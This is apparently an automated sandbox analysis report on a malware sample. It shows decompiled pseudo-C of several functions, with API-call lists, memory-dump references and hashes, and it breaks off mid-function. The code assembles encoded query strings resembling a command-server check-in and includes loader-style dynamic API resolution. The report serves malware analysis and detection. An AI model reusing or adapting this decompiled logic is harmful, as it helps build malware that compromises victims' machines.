					_t35 =  *0x52fa2d4; // 0x215d5a8
					_t2 = _t35 + 0x52fb613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x52fa02c,  *0x52fa004, _t110);
					_t38 = E052F6A09();
					_t39 =  *0x52fa2d4; // 0x215d5a8
					_t3 = _t39 + 0x52fb653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x52fa2d4; // 0x215d5a8
						_t7 = _t92 + 0x52fb65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E052F5040(_t99);
					_t44 =  *0x52fa2d4; // 0x215d5a8
					_t9 = _t44 + 0x52fb302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x52fa2d4; // 0x215d5a8
					_t11 = _t48 + 0x52fb2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x52fa32c; // 0x74595b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x52fa2d4; // 0x215d5a8
						_t13 = _t88 + 0x52fb676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x52fa37c; // 0x7459630
					_a28 = E052F2885(0x52fa00a, _t105 + 4);
					_t55 =  *0x52fa31c; // 0x74595e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x52fa2d4; // 0x215d5a8
						_t16 = _t84 + 0x52fb8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x52fa318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x52fa2d4; // 0x215d5a8
						_t18 = _t81 + 0x52fb8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x52fa290, _t107, 0x800);
						if(_t98 != _t107) {
							E052F2DD0(GetTickCount());
							_t62 =  *0x52fa37c; // 0x7459630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x52fa37c; // 0x7459630
							__imp__(_t66 + 0x40);
							_t68 =  *0x52fa37c; // 0x7459630
							_t115 = E052F624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x52f92ac);
								_push(_t115);
								_t108 = E052F21C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E052F1032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E052F1492();
									}
									HeapFree( *0x52fa290, 0, _v24);
								}
								HeapFree( *0x52fa290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x52fa290, _t107, _t98);
						}
						HeapFree( *0x52fa290, _t107, _a20);
					}
					HeapFree( *0x52fa290, _t107, _t117);
				}
				return _v16;
			}





















































                                0x052f6efc
                                0x052f6f10
                                0x052f6f12
                                0x052f6f20
                                0x052f6f24
                                0x052f6f2c
                                0x052f6f34
                                0x052f6f34
                                0x052f6f36
                                0x052f6f42
                                0x052f6f51
                                0x052f6f56
                                0x052f6f59
                                0x052f6f5e
                                0x052f6f61
                                0x052f6f66
                                0x052f6f69
                                0x052f6f75
                                0x052f6f82
                                0x052f6f84
                                0x052f6f8a
                                0x052f6f8f
                                0x052f6f9a
                                0x052f6f9c
                                0x052f6f9f
                                0x052f6fa5
                                0x052f6fa7
                                0x052f6fb0
                                0x052f6fbb
                                0x052f6fbd
                                0x052f6fc0
                                0x052f6fc0
                                0x052f6fc2
                                0x052f6fc9
                                0x052f6fce
                                0x052f6fdb
                                0x052f6fdd
                                0x052f6fe2
                                0x052f6ff0
                                0x052f6ff2
                                0x052f6ff7
                                0x052f6ffc
                                0x052f6fff
                                0x052f7004
                                0x052f700f
                                0x052f7011
                                0x052f7014
                                0x052f7014
                                0x052f7016
                                0x052f7029
                                0x052f702d
                                0x052f7032
                                0x052f7036
                                0x052f7039
                                0x052f703e
                                0x052f7049
                                0x052f704b
                                0x052f704e
                                0x052f704e
                                0x052f7050
                                0x052f7057
                                0x052f705a
                                0x052f705f
                                0x052f7069
                                0x052f706b
                                0x052f7072
                                0x052f708a
                                0x052f708e
                                0x052f709a
                                0x052f709f
                                0x052f70a8
                                0x052f70b9
                                0x052f70bd
                                0x052f70c6
                                0x052f70cc
                                0x052f70d9
                                0x052f70e6
                                0x052f70ec
                                0x052f70f4
                                0x052f70fa
                                0x052f7100
                                0x052f7104
                                0x052f7108
                                0x052f710e
                                0x052f7112
                                0x052f7119
                                0x052f7120
                                0x052f7124
                                0x052f712f
                                0x052f7136
                                0x052f713a
                                0x052f7143
                                0x052f7143
                                0x052f7154
                                0x052f7154
                                0x052f7163
                                0x052f7169
                                0x052f7169
                                0x052f7173
                                0x052f7173
                                0x052f7184
                                0x052f7184
                                0x052f7192
                                0x052f7192
                                0x052f71a2

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 052F6F1A
                                • GetTickCount.KERNEL32 ref: 052F6F2E
                                • wsprintfA.USER32 ref: 052F6F7D
                                • wsprintfA.USER32 ref: 052F6F9A
                                • wsprintfA.USER32 ref: 052F6FBB
                                • wsprintfA.USER32 ref: 052F6FD9
                                • wsprintfA.USER32 ref: 052F6FEE
                                • wsprintfA.USER32 ref: 052F700F
                                • wsprintfA.USER32 ref: 052F7049
                                • wsprintfA.USER32 ref: 052F7069
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 052F7084
                                • GetTickCount.KERNEL32 ref: 052F7094
                                • RtlEnterCriticalSection.NTDLL(074595F0), ref: 052F70A8
                                • RtlLeaveCriticalSection.NTDLL(074595F0), ref: 052F70C6
                                  • Part of subcall function 052F624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6278
                                  • Part of subcall function 052F624D: lstrlen.KERNEL32(00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6280
                                  • Part of subcall function 052F624D: strcpy.NTDLL ref: 052F6297
                                  • Part of subcall function 052F624D: lstrcat.KERNEL32(00000000,00000000), ref: 052F62A2
                                  • Part of subcall function 052F624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F62BF
                                • StrTrimA.SHLWAPI(00000000,052F92AC,00000000,07459630), ref: 052F70F4
                                  • Part of subcall function 052F21C1: lstrlen.KERNEL32(074587FA,00000000,00000000,00000000,052F7100,00000000), ref: 052F21D1
                                  • Part of subcall function 052F21C1: lstrlen.KERNEL32(?), ref: 052F21D9
                                  • Part of subcall function 052F21C1: lstrcpy.KERNEL32(00000000,074587FA), ref: 052F21ED
                                  • Part of subcall function 052F21C1: lstrcat.KERNEL32(00000000,?), ref: 052F21F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 052F7112
                                • lstrcat.KERNEL32(00000000,00000000), ref: 052F7120
                                • lstrcat.KERNEL32(00000000,00000000), ref: 052F7124
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 052F7154
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 052F7163
                                • HeapFree.KERNEL32(00000000,00000000,00000000,07459630), ref: 052F7173
                                • HeapFree.KERNEL32(00000000,?), ref: 052F7184
                                • HeapFree.KERNEL32(00000000,00000000), ref: 052F7192
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                • String ID:
                                • API String ID: 1837416118-0
                                • Opcode ID: 9db775debda47f7b494e0f785d78d3ddc340c7e1ab68080f30f18d24d9381de7
                                • Instruction ID: 2c77efbb28f1fb58d31059ed37ad802e5fddfb70604af5fda75d39e5d27263ef
                                • Opcode Fuzzy Hash: 9db775debda47f7b494e0f785d78d3ddc340c7e1ab68080f30f18d24d9381de7
                                • Instruction Fuzzy Hash: 0E716F71624105AFD721DB68FC4EE5B7BE8FF88720B150539FA4EC3290DB36A8459B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F46D1, Relevance: 33.3, APIs: 22, Instructions: 262memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 77%
                                			E052F46D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x52fa018; // 0x4934a3dd
				asm("bswap eax");
				_t65 =  *0x52fa014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x52fa010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x52fa00c; // 0x69ab8210
				asm("bswap eax");
				_t68 =  *0x52fa2d4; // 0x215d5a8
				_t3 = _t68 + 0x52fb613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x52fa02c,  *0x52fa004, _t63);
				_t71 = E052F6A09();
				_t72 =  *0x52fa2d4; // 0x215d5a8
				_t4 = _t72 + 0x52fb653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x52fa2d4; // 0x215d5a8
					_t8 = _t139 + 0x52fb65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E052F5040(_t144);
				_t77 =  *0x52fa2d4; // 0x215d5a8
				_t10 = _t77 + 0x52fb302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x52fa2d4; // 0x215d5a8
				_t12 = _t81 + 0x52fb7aa; // 0x7458d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x52fb2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x52fa31c; // 0x74595e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x52fa2d4; // 0x215d5a8
					_t18 = _t135 + 0x52fb8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x52fa32c; // 0x74595b0
				if(_t86 != 0) {
					_t132 =  *0x52fa2d4; // 0x215d5a8
					_t20 = _t132 + 0x52fb676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x52fa37c; // 0x7459630
				_t88 = E052F2885(0x52fa00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x52fa290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x52fa290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x52fa290, _t167, _v12);
						goto L28;
					}
					E052F2DD0(GetTickCount());
					_t95 =  *0x52fa37c; // 0x7459630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x52fa37c; // 0x7459630
					__imp__(_t99 + 0x40);
					_t101 =  *0x52fa37c; // 0x7459630
					_t163 = E052F624D(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x52fa290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x52f92ac);
					_push(_t163);
					_t107 = E052F21C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x52fa290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E052F4AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E052F1492();
						L24:
						HeapFree( *0x52fa290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E052F26C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E052F161A(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E052F50CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E052F580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E052F50CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}


























































                                0x052f46d1
                                0x052f46d1
                                0x052f46d1
                                0x052f46da
                                0x052f46df
                                0x052f46e6
                                0x052f46e8
                                0x052f46e8
                                0x052f46f5
                                0x052f4700
                                0x052f4703
                                0x052f470e
                                0x052f4711
                                0x052f4716
                                0x052f4719
                                0x052f471e
                                0x052f4721
                                0x052f472d
                                0x052f473a
                                0x052f473c
                                0x052f4742
                                0x052f4747
                                0x052f4752
                                0x052f4754
                                0x052f4757
                                0x052f475d
                                0x052f475f
                                0x052f4767
                                0x052f4772
                                0x052f4774
                                0x052f4777
                                0x052f4777
                                0x052f4779
                                0x052f4780
                                0x052f4785
                                0x052f4792
                                0x052f4794
                                0x052f4799
                                0x052f47a1
                                0x052f47a4
                                0x052f47aa
                                0x052f47b5
                                0x052f47b7
                                0x052f47bc
                                0x052f47c1
                                0x052f47c4
                                0x052f47c9
                                0x052f47d4
                                0x052f47d6
                                0x052f47d9
                                0x052f47d9
                                0x052f47db
                                0x052f47e2
                                0x052f47e5
                                0x052f47ea
                                0x052f47f4
                                0x052f47f6
                                0x052f47f6
                                0x052f47f9
                                0x052f4807
                                0x052f480c
                                0x052f4810
                                0x052f4813
                                0x052f49dd
                                0x052f49e5
                                0x052f49f2
                                0x052f4819
                                0x052f4825
                                0x052f482d
                                0x052f4830
                                0x052f49cd
                                0x052f49d7
                                0x00000000
                                0x052f49d7
                                0x052f483c
                                0x052f4841
                                0x052f484a
                                0x052f485b
                                0x052f485f
                                0x052f4868
                                0x052f486e
                                0x052f487b
                                0x052f4882
                                0x052f488b
                                0x052f4891
                                0x052f49bd
                                0x052f49c7
                                0x00000000
                                0x052f49c7
                                0x052f489d
                                0x052f48a3
                                0x052f48a4
                                0x052f48ab
                                0x052f48ae
                                0x052f49af
                                0x052f49b7
                                0x00000000
                                0x052f49b7
                                0x052f48b7
                                0x052f48bd
                                0x052f48c6
                                0x052f48cf
                                0x052f48da
                                0x052f48e1
                                0x052f48e4
                                0x052f49f5
                                0x052f4997
                                0x052f4997
                                0x052f499c
                                0x052f49a7
                                0x052f49ad
                                0x00000000
                                0x052f49ad
                                0x052f48ee
                                0x052f48f5
                                0x052f48f8
                                0x052f48fd
                                0x052f490d
                                0x052f4910
                                0x052f4916
                                0x052f491c
                                0x052f4922
                                0x052f4925
                                0x052f492b
                                0x052f492e
                                0x052f4933
                                0x052f4937
                                0x052f4937
                                0x052f4943
                                0x052f494f
                                0x052f4953
                                0x052f4955
                                0x052f495a
                                0x052f495c
                                0x052f4961
                                0x052f4966
                                0x052f4973
                                0x052f497b
                                0x052f497e
                                0x052f497e
                                0x052f495a
                                0x00000000
                                0x052f4945
                                0x052f4949
                                0x052f4980
                                0x052f4983
                                0x052f498c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f498c
                                0x052f494b
                                0x00000000
                                0x052f494b
                                0x052f4943

                                APIs
                                • GetTickCount.KERNEL32 ref: 052F46E8
                                • wsprintfA.USER32 ref: 052F4735
                                • wsprintfA.USER32 ref: 052F4752
                                • wsprintfA.USER32 ref: 052F4772
                                • wsprintfA.USER32 ref: 052F4790
                                • wsprintfA.USER32 ref: 052F47B3
                                • wsprintfA.USER32 ref: 052F47D4
                                • wsprintfA.USER32 ref: 052F47F4
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 052F4825
                                • GetTickCount.KERNEL32 ref: 052F4836
                                • RtlEnterCriticalSection.NTDLL(074595F0), ref: 052F484A
                                • RtlLeaveCriticalSection.NTDLL(074595F0), ref: 052F4868
                                  • Part of subcall function 052F624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6278
                                  • Part of subcall function 052F624D: lstrlen.KERNEL32(00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6280
                                  • Part of subcall function 052F624D: strcpy.NTDLL ref: 052F6297
                                  • Part of subcall function 052F624D: lstrcat.KERNEL32(00000000,00000000), ref: 052F62A2
                                  • Part of subcall function 052F624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F62BF
                                • StrTrimA.SHLWAPI(00000000,052F92AC,?,07459630), ref: 052F489D
                                  • Part of subcall function 052F21C1: lstrlen.KERNEL32(074587FA,00000000,00000000,00000000,052F7100,00000000), ref: 052F21D1
                                  • Part of subcall function 052F21C1: lstrlen.KERNEL32(?), ref: 052F21D9
                                  • Part of subcall function 052F21C1: lstrcpy.KERNEL32(00000000,074587FA), ref: 052F21ED
                                  • Part of subcall function 052F21C1: lstrcat.KERNEL32(00000000,?), ref: 052F21F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 052F48BD
                                • lstrcat.KERNEL32(00000000,?), ref: 052F48CF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 052F48D5
                                  • Part of subcall function 052F4AA6: lstrlen.KERNEL32(?,00000000,07459C98,74ECC740,052F13D0,07459E9D,052F55DE,052F55DE,?,052F55DE,?,63699BC3,E8FA7DD7,00000000), ref: 052F4AAD
                                  • Part of subcall function 052F4AA6: mbstowcs.NTDLL ref: 052F4AD6
                                  • Part of subcall function 052F4AA6: memset.NTDLL ref: 052F4AE8
                                • wcstombs.NTDLL ref: 052F4966
                                  • Part of subcall function 052F161A: SysAllocString.OLEAUT32(00000000), ref: 052F165B
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 052F49A7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 052F49B7
                                • HeapFree.KERNEL32(00000000,00000000,?,07459630), ref: 052F49C7
                                • HeapFree.KERNEL32(00000000,?), ref: 052F49D7
                                • HeapFree.KERNEL32(00000000,?), ref: 052F49E5
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 972889839-0
                                • Opcode ID: ce194bc5ac3adf05cb2be9bc6e5db1822f71a4821922f29bc683cf0cbedfe0c1
                                • Instruction ID: f06111be71a4598db533b17fa120869e9aecd1b49389ded3016b0959d00baa4a
                                • Opcode Fuzzy Hash: ce194bc5ac3adf05cb2be9bc6e5db1822f71a4821922f29bc683cf0cbedfe0c1
                                • Instruction Fuzzy Hash: D6A13871620109AFDB11EFA8FC8DE9A7FA9FF49320B144035FA09C7290DB759950DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F5927, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E052F5927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x52fa38c; // 0x7459ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E052F4E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x52f91ac;
				}
				_t46 = E052F42F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E052F6837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x52fa2d4; // 0x215d5a8
						_t16 = _t75 + 0x52fbaa8; // 0x530025
						 *0x52fa138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E052F4E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x52f91b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E052F6837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E052F50CA(_v20);
						} else {
							_t66 =  *0x52fa2d4; // 0x215d5a8
							_t31 = _t66 + 0x52fbbc8; // 0x73006d
							 *0x52fa138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E052F50CA(_v12);
				}
				return _v24;
			}




























                                0x052f592f
                                0x052f5935
                                0x052f593c
                                0x052f5942
                                0x052f5946
                                0x052f594a
                                0x052f594d
                                0x052f5954
                                0x052f5957
                                0x052f5959
                                0x052f5959
                                0x052f5962
                                0x052f5969
                                0x052f596c
                                0x052f5972
                                0x052f597c
                                0x052f5985
                                0x052f598c
                                0x052f59a5
                                0x052f59ac
                                0x052f59af
                                0x052f59b8
                                0x052f59c1
                                0x052f59d2
                                0x052f59db
                                0x052f59df
                                0x052f59e3
                                0x052f59ea
                                0x052f59ed
                                0x052f59ef
                                0x052f59ef
                                0x052f59f9
                                0x052f5a02
                                0x052f5a09
                                0x052f5a21
                                0x052f5a25
                                0x052f5a62
                                0x052f5a27
                                0x052f5a2a
                                0x052f5a32
                                0x052f5a43
                                0x052f5a4f
                                0x052f5a57
                                0x052f5a5b
                                0x052f5a5b
                                0x052f5a25
                                0x052f5a6a
                                0x052f5a6f
                                0x052f5a76

                                APIs
                                • GetTickCount.KERNEL32 ref: 052F593C
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 052F597C
                                • lstrlen.KERNEL32(00000000), ref: 052F5985
                                • lstrlen.KERNEL32(00000000), ref: 052F598C
                                • lstrlenW.KERNEL32(80000002), ref: 052F5999
                                • lstrlen.KERNEL32(?,00000004), ref: 052F59F9
                                • lstrlen.KERNEL32(?), ref: 052F5A02
                                • lstrlen.KERNEL32(?), ref: 052F5A09
                                • lstrlenW.KERNEL32(?), ref: 052F5A10
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: cc904542efb73d4e78f800e30440887053419e4ed4cff12f9d2f109e75797be6
                                • Instruction ID: f0021e3af0dac149e7e73737ead1bc828b971ae8528e5875c04ff9cd06e81df9
                                • Opcode Fuzzy Hash: cc904542efb73d4e78f800e30440887053419e4ed4cff12f9d2f109e75797be6
                                • Instruction Fuzzy Hash: B3413C72A10219EBCF11AFA4EC49E9EBBB5FF44314F050064FE08A7251D7359A64DF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F51A8, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 61%
                                			E052F51A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E052F4F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E052F77A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x52fa2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x52fa2d4; // 0x215d5a8
					_t18 = _t50 + 0x52fb4a3; // 0x73797325
					_t52 = E052F6343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x52fa2d4; // 0x215d5a8
						_t20 = _t53 + 0x52fb770; // 0x7458d18
						_t21 = _t53 + 0x52fb0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
